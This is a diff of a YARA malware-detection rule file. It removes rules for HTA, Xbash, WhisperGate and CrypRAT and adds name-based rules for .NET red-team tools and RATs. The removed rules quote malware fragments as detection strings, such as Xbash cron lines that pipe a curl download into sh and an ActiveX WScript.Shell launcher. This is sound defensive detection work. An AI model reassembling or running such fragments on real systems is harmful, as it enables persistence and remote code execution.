+		modified = "2024-12-10"
+		reference = "https://github.com/trustedsec/trevorc2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L376-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "17ae559a4640636f1285c7078a4366954d5a41c098419db32315e354f0ae619d"
-		score = 60
+		logic_hash = "c1d56ef865e6619d9d0deff90b154c63cc3036a8521d3952819e45f51fca9fea"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "App_Web_juvjerf3.dll" fullword ascii
-		$ = "App_Web_vcplrg8q.dll" fullword ascii
-		$ = "ar_all2.txt" fullword ascii
-		$ = "ar_sa.txt" fullword ascii
-		$ = "Convert.FromBase64String(temp[1])" fullword ascii
-		$ = "D68gq#5p0(3Ndsk!" fullword ascii
-		$ = "dcomnetsrv" fullword ascii
-		$ = "ERRORF~1.ASP" fullword ascii
-		$ = "intelliAdminRpc" fullword ascii
-		$ = "J8fs4F4rnP7nFl#f" fullword ascii
-		$ = "Msnb.exe" fullword ascii
-		$ = "nautilus-service.dll"
-		$ = "Neuron_service" fullword ascii
-		$ = "owa_ar2.bat" fullword ascii
-		$ = "payload.x64.dll.system" fullword ascii
-		$ = "service.x64.dll.system" fullword ascii
+		$name = "trevorc2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_HTA_With_Wscript_Shell
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_DNS2 : FILE
 {
 	meta:
-		description = "Detects WScript Shell in HTA"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2faf74b1-c19c-53f0-ad08-be9caf5640bc"
-		date = "2017-06-21"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hta_anomalies.yar#L11-L26"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "0fa01355-de57-573e-9056-0b7a5d24572d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L391-L404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ce2728fbd3023a6b96291cdb63f30dc9b71e5fc506f8b00ad97e3062b103478"
-		score = 80
+		logic_hash = "765e6117f69fb58e5e71544badc8135b2ec641a74cc0489a7c79308ca2837bd7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$s1 = "<hta:application windowstate=\"minimize\"/>"
-		$s2 = "<script>var b=new ActiveXObject(\"WScript.Shell\");" ascii
+		$name = "NativePayload_DNS2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_HTA_Embedded
+rule SIGNATURE_BASE_HKTL_NET_NAME_Aggressiveproxy : FILE
 {
 	meta:
-		description = "Detects an embedded HTA file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "04d4c718-9dd6-5528-8712-61c9f2a16139"
-		date = "2017-06-21"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hta_anomalies.yar#L28-L42"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "e2d3c4e2-404b-59f8-b3d0-a7cef4dfd0ff"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/EncodeGroup/AggressiveProxy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L406-L419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "843f0ad5e39e5492db8ff7372f6d2038e7dbb7823ec9b33f863ab891a108b1ec"
-		score = 50
+		logic_hash = "702b0cc858cb1687962ac403a730e5f778bf51fc91627c50103e4299f4a3ca5f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$s1 = "<hta:application windowstate=\"minimize\"/>"
+		$name = "AggressiveProxy" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$s1 and not $s1 in ( 0 .. 50000 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Base64_PS1_Shellcode
+rule SIGNATURE_BASE_HKTL_NET_NAME_Msbuildapicaller : FILE
 {
 	meta:
-		description = "Detects Base64 encoded PS1 Shellcode"
-		author = "Nick Carr, David Ledbetter"
-		id = "7c3cec3b-a192-5bfd-b4f1-22b1afeb717e"
-		date = "2018-11-14"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1062601684566843392"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps1_shellcode.yar#L1-L15"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "143da57f-b01f-5688-b741-1bc4d06cd7d1"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/rvrsh3ll/MSBuildAPICaller"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L421-L434"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fac6f41965eb2209f1552763800d6a2b172f28cd29bb7586d180654aab1e6d56"
-		score = 65
+		logic_hash = "3c1f33c759e6331c562dbf76ce7e34ee82d10070e331d0967143d9d7fad077fc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$substring = "AAAAYInlM"
-		$pattern1 = "/OiCAAAAYInlM"
-		$pattern2 = "/OiJAAAAYInlM"
+		$name = "MSBuildAPICaller" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$substring and 1 of ( $p* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_PY_Sep18 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Graykeylogger : FILE
 {
 	meta:
-		description = "Detects Xbash malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97512fe8-002f-5cbc-a915-d55c087fbef7"
-		date = "2018-09-18"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L13-L25"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "c63875b6-1701-5594-927e-833c25dc5d98"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DarkSecDevelopers/GrayKeylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L436-L449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d686c42e6bf440507735f846463f2df5fbf4f7bd5f5656883655a5278a1fc252"
+		logic_hash = "b8e12c5ddf0d50d0b3681594c8bc3410a24dab00035a5959e20d20045dacbbbd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 73 58 62 61 73 68 00 00 00 00 00 00 00 00 }
+		$name = "GrayKeylogger" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 10000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_SH_Sep18 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Weevely3 : FILE
 {
 	meta:
-		description = "Detects Xbash malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "450ef15f-fe9c-5809-9077-457a43326bfe"
-		date = "2018-09-18"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L27-L48"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "6bf766b6-d065-5a84-8258-3be448b9cbb8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/epinna/weevely3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L451-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b48cbd64002025d861e2fd381be5a68efd7f6fc5fd239850c940f887e2b01673"
+		logic_hash = "c57c6ba5276679a2d32e9b0ebb61059c5bed1ba45f9792ecef3d5c7244f38f24"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
-		hash2 = "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"*/5 * * * * curl -fsSL" fullword ascii
-		$s2 = ".sh|sh\" > /var/spool/cron/root" ascii
-		$s3 = "#chmod +x /tmp/hawk" fullword ascii
-		$s4 = "if [ ! -f \"/tmp/root.sh\" ]" fullword ascii
-		$s5 = ".sh > /tmp/lower.sh" ascii
-		$s6 = "chmod 777 /tmp/root.sh" fullword ascii
-		$s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
-		$s8 = "-C /tmp/pools.txt>/dev/null 2>&1" ascii
+		$name = "weevely3" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_JS_Sep18 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Fudgec2 : FILE
 {
 	meta:
-		description = "Detects XBash malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e891d146-f92d-5144-a1f2-ad308e309870"
-		date = "2018-09-18"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L50-L66"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a8e70bce-76dd-53dc-9a19-1cc6795fdef3"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Ziconius/FudgeC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L466-L479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf2f9006e0ab07f6ff1a0ce4946af34468f7c74143c853c5d77c6db725bb590a"
+		logic_hash = "89f3bf4b81a901e813c3021422c362d7e075dec7fd76240be121f677039f1994"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "var path=WSHShell" fullword ascii
-		$s2 = "var myObject= new ActiveXObject(" ascii
-		$s3 = "window.resizeTo(0,0)" fullword ascii
-		$s4 = "<script language=\"JScript\">" fullword ascii
+		$name = "FudgeC2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 5KB and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverse_Tcp : FILE
 {
 	meta:
-		description = "Detects unknown wiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f04b619e-1df2-5c51-9cab-4a0fffd1c042"
-		date = "2022-01-16"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L2-L23"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a6b935cc-adb6-5ff4-a832-1043e77292f7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L481-L494"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72eb50a70b3f2fbb232134ef4706dbb15bdb5893fe06d899bff3b7aacdfadd30"
-		score = 85
+		logic_hash = "055ee105cd46e54b4f49dd92975ecc08a6184fa8508585ee528d19de34914758"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 41 41 41 41 41 00 59 6F 75 72 20 68 61 72 64 20
-               64 72 69 76 65 20 68 61 73 20 62 65 65 6E 20 63
-               6F 72 72 75 70 74 65 64 }
-		$op1 = { 89 34 24 e8 3f ff ff ff 50 8d 65 f4 31 c0 59 5e 5f }
-		$op2 = { 8d bd e8 df ff ff e8 04 de ff ff b9 00 08 00 00 f3 a5 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 03 00 00 00 c7 44 24 0c 00 00 00 00 }
-		$op3 = { c7 44 24 0c 00 00 00 00 c7 44 24 08 00 02 00 00 89 44 24 04 e8 aa fe ff ff 83 ec 14 89 34 24 e8 3f ff ff ff 50 }
+		$name = "NativePayload_Reverse_tcp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Jan22_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharphose : FILE
 {
 	meta:
-		description = "Detects unknown wiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "822e5af5-9c51-5be3-94f1-7e0a714743e6"
-		date = "2022-01-16"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L25-L57"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "89b00eb0-f1a2-5c77-a5b0-2329b08aadb7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/ustayready/SharpHose"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L496-L509"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87a03e95bc1c33d1b3343ec7369c516bb15791943fbb122de11867ad4bddd565"
-		score = 90
+		logic_hash = "e3af2a156c2451f7ed2fe3e888fdf2ae080298f7eff56801ddc0c612f04902ee"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00
-               6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00
-               55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00
-               63 00 67 00 42 00 30 00 41 00 43 }
-		$sc2 = { 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00
-               70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68 }
-		$s1 = "xownxloxadDxatxxax" wide
-		$s2 = "0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==" wide
-		$s3 = "https://cdn.discordapp.com/attachments/" wide
-		$s4 = "fffxfff.fff" ascii fullword
-		$op1 = { 20 6b 85 b9 03 20 14 19 91 52 61 65 20 e1 ae f1 }
-		$op2 = { aa ae 74 20 d9 7c 71 04 59 20 71 cc 13 91 61 20 97 3c 2a c0 }
-		$op3 = { 38 9c f3 ff ff 20 f2 96 4d e9 20 5d ae d9 ce 58 20 4f 45 27 }
-		$op4 = { d4 67 d4 61 80 1c 00 00 04 38 35 02 00 00 20 27 c0 db 56 65 20 3d eb 24 de 61 }
+		$name = "SharpHose" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them or 7 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_HKTL_Wiper_Whispergate_Stage3_Jan22 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_RAT_Njrat_0_7D_Modded_Source_Code : FILE
 {
 	meta:
-		description = "Detects reversed stage3 related to Ukrainian wiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5d562cd-03ef-5450-8044-3f538cea32d0"
-		date = "2022-01-16"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L59-L74"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "2b7d1f75-0164-561e-8199-32c601cbca98"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L511-L524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b06536b6a6eebd5fb398ba2617bf68a5b2c4b0035766b3cd0fc03d95019891ec"
+		logic_hash = "f437195348452242adc8b55d6d517a17764c53188fa2de5cd15848fd23827381"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 65 31 63 70 00 31 79 72 61 72 62 69 4c 73 73 61 6c 43 00 6e 69 61 4d }
-		$s1 = "lld." wide
+		$name = "RAT-NjRat-0.7d-modded-source-code" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( filesize -2 ) == 0x4d5a and filesize < 5000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_OBFUSC_Unknown_Jan22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Rdpthief : FILE
 {
 	meta:
-		description = "Detects samples similar to reversed stage3 found in Ukrainian wiper incident named WhisperGate"
-		author = "Florian Roth (Nextron Systems)"
-		id = "647c0092-b03d-5627-8568-ddaa982c73a1"
-		date = "2022-01-16"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L76-L101"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "5ad4feec-50db-5ebb-a609-9196e72a24aa"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/0x09AL/RdpThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L526-L539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26a295d3b78c3a33d776a648aa0f410ac7cb5021ad9d3b294ff9629d6ba7132a"
+		logic_hash = "8e472c8265d517e512eada819627d56ff449fae4d80054946e9ea96f74004f05"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 37 00 63 00 38 00 63 00 62 00 35 00 35 00 39 00
-               38 00 65 00 37 00 32 00 34 00 64 00 33 00 34 00
-               33 00 38 00 34 00 63 00 63 00 65 00 37 00 34 00
-               30 00 32 00 62 00 31 00 31 00 66 00 30 00 65 }
-		$xc2 = { 4D 61 69 6E 00 43 6C 61 73 73 4C 69 62 72 61 72
-               79 31 00 70 63 31 65 }
-		$s1 = ".dll" wide
-		$s2 = "%&%,%s%" ascii fullword
-		$op1 = { a2 87 fa b1 44 a5 f5 12 da a7 49 11 5c 8c 26 d4 75 }
-		$op2 = { d7 af 52 38 c7 47 95 c8 0e 88 f3 d5 0b }
-		$op3 = { 6c 05 df d6 b8 ac 11 f2 67 16 cb b7 34 4d b6 91 }
+		$name = "RdpThief" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Unknown_Discord_Characteristics_Jan22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Runascs : FILE
 {
 	meta:
-		description = "Detects unknown malware with a few indicators also found in Wiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "23ee5319-6a72-517b-8ea0-55063b6b862c"
-		date = "2022-01-16"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_wiper_whispergate.yar#L103-L119"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "c5fc5b01-1d30-5af5-be99-e629cb23295b"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/antonioCoco/RunasCs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L541-L554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f9cf4a15be0ab35a0d0f0c9b1a191f623f905c8fc9da651872de7c025a27a806"
+		logic_hash = "9fd22a3e92222134c101693b944a2ad53055f9cfafe99823fd6f412981f5afa3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "xownxloxadDxatxxax" wide
-		$s2 = "https://cdn.discordapp.com/attachments/" wide
+		$name = "RunasCs" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Cryprat_Jan19_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_IP6DNS : FILE
 {
 	meta:
-		description = "Detects CrypRAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f3063a16-8813-5d6c-9807-6a0725907fb5"
-		date = "2019-01-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_cryp_rat.yar#L3-L19"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3b32b408-e71a-5f2a-ae6f-72a3d6572b71"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L556-L569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69f8a581bae1a2c411e09e8fe01a979645ef897038af868d8e9f2a2ce9188080"
-		score = 90
+		logic_hash = "509c396b97524335735107644460eebed3146b2bc5f8dedb909c9754b2121f5f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Cryp_RAT" fullword wide
+		$name = "NativePayload_IP6DNS" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "2524e5e9fe04d7bfe5efb3a5e400fe4b" or 1 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_XMRIG_Monero_Miner : HIGHVOL FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_ARP : FILE
 {
 	meta:
-		description = "Detects Monero mining software"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71bf1b9c-c806-5737-83a9-d6013872b11d"
-		date = "2018-01-04"
-		modified = "2022-11-10"
-		reference = "https://github.com/xmrig/xmrig/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L11-L33"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "9fac11f8-4e40-5cbc-a990-2ae48df20828"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L571-L584"
